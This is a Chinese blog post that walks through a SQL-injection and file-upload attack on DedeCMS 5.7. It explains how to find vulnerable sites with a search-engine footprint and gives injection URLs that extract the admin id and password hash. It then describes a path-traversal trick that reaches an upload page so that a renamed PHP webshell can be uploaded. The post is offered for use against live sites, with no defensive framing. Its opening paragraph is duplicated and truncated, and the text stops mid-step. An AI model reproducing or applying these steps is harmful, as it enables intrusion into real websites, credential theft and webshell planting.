dedecms5.7最新注入和上传漏洞
漏洞描述:百度搜索关键字Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc,获得使用DeDeCMS系统的网站。 注入漏洞。首先访问/data/admin/ver.txt页面获取系统最后升级时间,然后访问/member/ajax_membergroup.php?action=postmembergroup=1页面, 然后访问/
漏洞描述:百度搜索关键字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”,获得使用DeDeCMS系统的网站。注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
然后写上语句/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id
/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'` 查看管理员密码
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
上传漏洞。要求网站开启新会员注册功能,首先注册新会员,无需通过邮件验证,
只要登陆会员中心,然后访问页面链接
“/plus/carbuyaction.php?dopost=memclickout&oid =S-P0RN8888&rs[code]=../dialog/select_soft_post”
说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
上一篇: CSS禅意 - 捌莱闲人
下一篇: 详解form表单的工作过程
推荐阅读
-
齐博cms最新SQL注入网站漏洞 可远程执行代码提权
-
BOSSI 公司企业网站管理系统注入&上传漏洞利用
-
上传漏洞----看完之后你也是黑客(中国菜刀和kali)
-
升级ImageMagick到最新版本,修复 ImageMagick拒绝服务漏洞(CVE-2017-1000476)和ImageMagick远程代码执行漏洞(CVE-2016-8707)
-
dedecms 5.6的最新注入漏洞
-
金山毒霸多个sql注入及XSS漏洞和修复
-
最新用友NC6.5文件上传漏洞
-
Oblog最新注入漏洞分析(已修补)
-
科讯KESION CMS最新版任意文件上传WEBSHELL漏洞
-
全网最新Log4j 漏洞修复和临时补救方法